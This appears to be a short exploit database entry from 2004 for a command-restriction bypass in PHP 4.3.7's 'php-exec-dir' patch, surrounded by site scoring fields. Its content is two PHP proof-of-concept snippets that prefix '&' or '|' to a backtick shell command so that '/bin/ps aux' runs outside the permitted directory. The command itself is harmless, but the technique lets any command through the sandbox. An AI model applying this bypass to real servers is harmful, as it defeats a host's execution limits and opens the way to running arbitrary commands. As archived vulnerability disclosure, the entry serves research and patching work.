Lucene search

K
exploitdbVeNoMouSEDB-ID:384
HistoryAug 08, 2004 - 12:00 a.m.

PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass

2004-08-0800:00:00
VeNoMouS
www.exploit-db.com
37

AI Score

7.4

Confidence

Low

EPSS

0.059

Percentile

93.6%

<?php 
$blah = `& /bin/ps aux`; 
echo nl2br($blah); 
?> 

<?php 
$blah = `| /bin/ps aux`; 
echo nl2br($blah); 
?> 


# milw0rm.com [2004-08-08]

AI Score

7.4

Confidence

Low

EPSS

0.059

Percentile

93.6%

Related for EDB-ID:384